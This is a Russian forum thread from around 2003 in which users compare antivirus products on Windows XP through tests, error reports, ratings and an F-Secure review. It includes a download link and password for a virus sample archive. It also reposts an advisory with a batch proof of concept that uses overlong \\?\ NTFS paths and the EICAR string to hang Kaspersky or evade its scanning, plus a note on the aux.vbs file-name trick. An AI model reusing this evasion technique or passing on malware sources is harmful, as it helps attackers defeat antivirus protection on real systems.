» Обзор антивирусов под Windows XP

Widok
Предлагаю из шапки убрать следующие строки,так как они подтверждают и повторяют написанное выше.Об ошибках здесь,в шапке,нечего писать,потому что:
1.Тестирование велось на маленькой базе
2.biomednet проводил тесты на Windows 98SE
3.Ошибки,которые были у него,не повторились у других,а если и некоторые были,то они уже наверное устранены.


Цитата:

Ошибки в работе:
Касперский - странное сообщение - ошибка ядра файла....
Пропущено 4 вируса, занесенные в базу.Вообще не увидел. Режим избыточного сканирования...
Пропущено 14 допплеров ( модификаций, от нем. доппельгангер- двойник)
Есть Официальное подтверждение службы поддержки.

Нортон - громоздкий интерфейс, пропущено 19 вирусов, занесенных в базу-ошибка удаления. Эвристических сообщений нет.


DrWeb - в 4 файлах видит вирусы при попытке лечить - виснет и зацикливается ( ***- вылечен... и так до бесконечности)
Вылечено 2 генератора вируса, нелечимые Каспером. Высокая скорость работы, отличная эвристика! Именно DrWeb нашл 14 допплеров, пропущенных Касперским.

BAT.MF.227
BAT.MF.251
Jerusalem.Zipeater
DREG-based
http://nod32.newmail.ru/DREG-based.exe
пароль 12345
эти файлы завешивают DrWeb 4.29b при лечении (15:27 17-01-2003 )
периодически не совпадали количества перемещенных и подозрительных обьектов в обе стороны, так что все это странно....


Макафя нашла вирусы в 2 файлах и на них повисла. ( просто подвисла и все)
Эвристических сообщений нет.
Обнаруженная проблема -
некорректная работа с вирусами
Win95.Rat.463 (зависание)
win.95.Rat.505 (зависание, после принудительной выгрузки макафи исходный файл из 4 кило превратился в 1109 Кило (практически мегабайт!)

NOD32 фантастическая скорость проверки. БольшАя часть вирусов обнаружена эвристикой - свыше 900 шт! Практически не лечит.

Norman VC - есть эвристические сообщения. Мало лечит. Бедный интерфейс.
Возможность менять настройки без перезагрузки. Средняя скорость работы.

Panda 7 antivirus Platinum Retail
Хороший интерфейс, много видит и лечит, есть эвристические сообщения.
Однако к концу работы плавно падает скорость.
В связи с очень медленной работой сканера Панды(вероятно при высокой эвристике и может быть, моногократной перезаписи лог-файла, может еще почему) на МОЕМ компе я выключил досрочно. Прошу перепроверить меня.

eTrust InaculateIT
Очень быстрый, безглючный, очень удобный понятный интерфейс,
богат настройками. Есть возможность менять движок. так что Вы получаете сразу 2 антивируса. Движок VET на этой коллекции нашел чуть меньше вирусов, зато "подобрал" вирусы, пропущенные предыдущим движком InaculateIT . Очень подробный информативный лог.

F-Prot Antivirus
Интерфейс богатый настройками, но серый и невзрачный в Win98/Me, стильный и красивый в WinXP....
есть сообщение, что не могу вылечить файл этого типа...
возможно, что файл с расширением был бы вылечен... может еще что... но и так очень неплохо!
Эвристик -

Итак, можно выбирать из представленного списка. Тест показал, что почти все антивирусы прекрасно работают.

(прошу учесть, что результаты теста условны и не могут служить для однозначной характеристики антивируса!!! )

...
Цитата:

P.S. Вирусы моей личной коллекции
пароль 12345, RAR 3.10

Таким образом мы уменьшим шапку.

To All:

Провожу тестирование финского антивируса F-Secure Antivirus 5.41.Скоро сделаю обзор.Пока что могу сказать,что у меня очень и очень положительные впечатления от этой версии...

Demetrio

Цитата:

Я бы не стал открывать скачанный файл в котором был вирус....

я бы тоже просто так не стал
и как после этого медицине ихней доверять

DrInvizzi

Цитата:

Об ошибках здесь,в шапке,нечего писать,потому что:
1.Тестирование велось на маленькой базе
2.biomednet проводил тесты на Windows 98SE
3.Ошибки,которые были у него,не повторились у других,а если и некоторые были,то они уже наверное устранены.

1. тестирование на бОльшей базе даст бОльшее количество ошибок - насколько я понимаю меньше их не станет
2. я думаю 98-я тут не сыграла большой роли
3. я подтвердил ошибки ДрВэб, biomednet в свою очередь подтвердил "странности" в работе и обновлениях F-Prot, про остальные ошибки все дружно промолчали не попытавшись их опровергнуть/подтвердить, нет сообщений и об устранении ошибок (а хотелось бы)
я не против компактной шапки но имхо об ошибках в целом надо говорить, и об их исправлениях тоже - если антивири такого уровня как МакКаффи и ДрВэб намертво виснут при лечении это заслуживает внимания как мне кажется


Добавлено
Widok
всё правильно
в первом посте нужно было убрать именно субъективные данные

вспомнил - запускал я из интереса один файл вылеченный Вэбом - инфицирования не произошло, к "сожалению" он и вправду его вылечил

я тут шапочку поменял как и обещал.

Цитата:

Козой я делал поиск игры Tomb Raider1-3.Вместо game мне предложили секс-мультик

Цитата:

NAV2003... обнаружил вирус Hantaner, затем вылечил этот файл... я его и открыл... начались глюки... Я снес NAV и поставил McAfee. Тот вирь... обнаружил, но сделать с ним что-либо отказался. Снес McAfee, поставил AVP4. Тот... снес этот файл. Впрочем, вирь уже успел порядком нагадить, так что пришлось в итоге сносить всю винду...

Как велика однако должна быть тяга к Ларе Крофт!

Цитата:

и как после этого медицине ихней доверять

Если у человека есть воля к жизни, то медицина бессильна!

ПРопостил McAfee с разными парами по 7226 объектах. Настройки - удалять заразу.
Результат: после McAfee осталось 60 файлов. Далее через остаток:
Число оставшихся файлов:
F-Prot - 23
InoccolateIT - 25
DrWeb - 45
Так что, несмотря на не нравящийся мне интерфейс, F-Prot - лучшая пара к McAfee.

Попробовал после него Доктором, осталось 19.
ИМХО третий сканер почти ничего не дает...

Цитата:

Если у человека есть воля к жизни, то медицина бессильна!

Я думаю,вместо того чтобы смеятся,вы бы заценили человека.Он РЕАЛЬНО боролся с вирусом и рассказал об этом.

tolja
Я и заценил. Откровенность и юмор, с которыми helix рассказал, как он
Цитата:

РЕАЛЬНО боролся с вирусом

вне всякого сомнения достойны уважения. Серьезно, без дураков.
А запостил я собственно к тому, что зачастую мы сами создаем себе на ровном месте такие проблемы, что ни одна прога не в состоянии их разрулить.
P.S. Я не исключение.

Цитата:

P.S. Я не исключение.

Господи,да мы все такие!

Люди!!!
Дайте please скачать эти 7226 объектов

Обнаружено несколько уязвимостей в "Антивирусе Касперского", которые могут использоваться для DoS атаки и обхода проверки злонамеренного кода.

1. Файловая система NTFS позволяет создавать пути почти неограниченной длины. Но Windows API не позволяет создавать пути длинее 256 байтов. Чтобы обойти это ограничение можно использовать в пути к файлу префикс ‘\\?\’ . Это зарегистрированная особенность Windows API. Путь, длиннее 256 символов, приведет к зависанию KAV службы или заставит ее потреблять 100% ресурсов CPU. Возможно, уязвимость может использоваться для выполнения произвольного кода. Длинный путь может также использоваться для обхода проверки антивирусом.

Пример:
<pre>
@echo off
SET
A=AAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAA
mkdir \\?\c:\%A%
mkdir \\?\c:\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%
mkdir \\?\c:\%A%\%A%\%A%\%A%\%A%\%A%
echo X5O!P%%@AP[4\PZX54(P^^)7CC)7} $EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H* >\\?\c:\%A%\%A%\%A%\%A%\%A%\%A%\%A%.com
</pre>

2. NTFS файл с именем aux.vbs или aux.com, содержащий злонамеренный код, не будет проверен антивирусом.

Уязвимость обнаружена в Kaspersky Antivirus 4.0.9.0 и более ранних версиях.

касп сосёт

Drweb soset KAv scanner i ne viletaet i nahodit vir hot tam budet C:|aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa\bbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbbb\ccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccccc\eeeeeeeeeeeeeeeeeeeeeeeeiiiiiiiiiiiiiiiiiiiiiiccccccccccccccccccccccaaaaaaaaaaaaaaaaaaaaaaaaarrrrrrrrrrrrrrr.com! a kogda na4inaesh drwebovskim scanerom dobiratsa do kone4nogo puti on prsoto viletaet bez errorv a spider takoy pur ne proveraet KAV foreva DrWeb otdiahet

Ps sorry za takoy dlinniy put!
Sorry esli kogo obidel!

Добавлено

Цитата:

NTFS файл с именем aux.vbs или aux.com, содержащий злонамеренный код, не будет проверен антивирусом

A ti porpobuy takoy fail sozday an ntfs ili pereimennuy eicar.com v aux.vbs ili com britva

I known that kaspersky have option to chek if file is corrupted .(it very usefull before installation of programs )
what other antivirus have this option ?

zxcvb

Цитата:

to chek if file is corrupted

Hmm i didn`t see options like you say! Please explane where did you read about this? or see?

SXP

Цитата:

KAV foreva DrWeb otdiahet

в суппорт бы лучше написал если баг нашел а не радовался

правда я вот второй день жду ответа от вэбовского сюпорта по поводу одного файлика...

SXP
У KAV этого в настройках нету, но в логе он повреждённые объекты отмечает.

Yes , Demetrio is correct .

Цитата:

У KAV этого в настройках нету, но в логе он повреждённые объекты отмечает.

So , what about other antivirus ?

Spybot
ja napisal i k bugu esho i vir prekripil nedelu nazad vir ne lovitsa novaja versija ne visla gg vot vam i support

zxcvb
Heh i`m sorry but i`m using only KAV and Drweb! I can`t find this usful thing in drweb

Добавлено
zxcvb
hey can you speak russian? If you understand russian language then plese speak russian! Because many peope on this forum can`t speak english ;( and they cannot understand you ;(

zxcvb
I've seen similar option in one of McAfee VirusScan configuration files, but this is not presented in program GUI, so I don't know how to use it...

SXP

русский я знаю , просто русских букв нет . транслитом писать я понял не пологено . на /ввв. цифирица. ру/цифирица. фп не охота было . а на англизком быстрее .

если кто не понял , хочу повторит цвой вопрос .
в каком антивирусе кроме касперского , можно проверит любой файл на неисправност (корруптед ).?
у кспера это в логе сканера или минитора .

удалил

Краткий обзор F-Secure Antivirus 5.41
Начну с того,что антивирус очень сильно изменился от версии 5.3.Это касается как его работы,так и другого.Значки в трее уже реагируют на клик мыши,есть неплохие настройки.Антивирус "оброс" сервисами,что всё-таки сказывется на работе с ним - иногда чувствуется лёгкое подтормаживание,но оно не мешает работе.
Что понравилось.Понравился быстрый доступ к настройкам через иконку монитора.И вообще,к этому претензий нет.Далее.Понравилось то,как F-Secure ищет гадов:уверенно,без промахов.Есть много эвристических срабатываний,во многом благодаря одному из трёх его движков - F-prot (ещё есть AVP и Orion).Очень понравилось окно,болшое и информативное,которое всплывает после обнаружения заразы резидентным монитором и то,что предлагается сделать дальше.Не обойду вниманием и то,что в антивирусе есть своя база вирусов,троянов и червей.Что я имею в виду?Вот нашли вы вирус например,Melissa,сразу же нажимаете кнопочку и переходите к описанию этого вируса.
Есть в антивирусе утилита BackWeb,с помощью которой вы обновляетесь.Ничего не надо делать больше после того,как Вы установили F-Secure.Он сразу же приступает к работе и Вы его практически не замечаете.
Обновления бывают ежедневно.

Стоит ещё заметить,что пользователями F-Secure являются:NASA,US Air Force,Yahoo,US Department of Defense Medical Branch,US Naval Warfare Center,San Diego Supercomputer Center,Lawrence-Livermore National Laboratory,IBM,Unisys,Siemens AG,EDS,Cisco,Nokia,Sonera,UUnet Technologies,Boeing,Bell Atlantiс,MCI.

Результаты тестирования на упомянутой базе:
F-Secure 5.41 с базой на 07.02.2003

Проверено: 7253
Инфицированных: 6895
Подозрительных: 341
Всего найденных: 7236
Время сканирования: 2.37 мин.

Одним словом,эта версия F-Secure Antivirus мне очень понравилась.Во всех отношениях.
В связи с тем,что этот антивирус показал отличные результаты при тестировании,приходится вводить его в рейтинг рекомендованных антивирусов под Windows XP.Теперь он выглядит так:

1.DrWeb 4.29b – 85 баллов
2.F-Secure Antivirus 5.41 - 80 баллов
3.AVP 3.5.1.6 - 76 баллов
4.McAfee VirusScan Pro 7.01 - 75 баллов
5.F-Prot Antivirus 3.12d – 62 балла
6.eTrust InoculateIT 6.0– 57 баллов
7.PC-cillin 2003 – 53 балла
8.Norton Antivirus 2003 – 48 баллов
9.Eset NOD32 - 44 баллав
10.Vexira Antivirus 2.04 - 33 балла

Всего наилучшего!

Ps vot novosti o KAV 5.0

 Пpивет тебе heker@mail.ru! Здоровеньки булы. 

Сижу никого не трогаю (на дворе Вторник Февраль 18 2003) и вижу:
heker@mail.ru пишет (Понедельник Февраль 17 2003) к Andy Nikishin:

h> nu mozet ~ datu skazete?
>> типа, до августа будет.. Hикаких сроков.
Hикаких сроков.

Всего тебе, heker@mail.ru...,
Andy Nikishin [AVP Team] [http://www.kaspersky.com]

DrInvizzi
а на какой системе вы проводили тест?
"лёгкое подтормаживание" может весьма разниться на P4 и P2 например...
надеюсь среди сервисов нет подобных live-update?
есть ли выборочная установка?
насколько чисто удаляется из системы?
есть ли конфликты с другими установленными антивирами?
размер и система апдейтов?
не понял про настройки - скажем с каким из конкурентов можно сравнить в этом плане? насколько детальные настройки?

SXP
Если быть точным, то:
а) номер будущей версии не назывался. Возможно, это будет 4.5. Обещано, однако, что безобразие с нумерацией модулей прекратится в следующей версии.
б) данное письмо носит сугубо неофициальный характер, что декларируется в эхе fido7.avp.support.
в) какая ж это новость, когда сроки неизвестны? "Август" назван "от балды" одним из подписчиков эхи.

albel
tovarish! Eto pismo prislo ot moego amial ja posilal mail! a ne iz exi!

SXP
сорри. Суть не меняется.
В эхе проскакивало примерно (если не точно) то же самое.

albel
net aj v ehe videl no aj spetsialno potom mail poslal v support a oni v stiahh otveteli vidno ih uze zadolbali

SXP
тяжело работать с текущей версией KAV. Я уже начал от неё уставать. От монитора отказался. Ждём-с сурпризов (приятных) от ЛК
P.S. Тоже им в суппорт написАть, что ли?

albel
aga napisi mozet whatz new uvidem...

На Softodrome вчера натолкнулся на следующую инфу:
"По слухам, в дистрибутив операционной системы Longhorn будет включена антивирусная программа (скорее всего, McAfee), т.е. антивирус станет частью операционной системы".
Ну и далее опрос на эту тему http://softodrom.ru/cgi-bin/golos.pl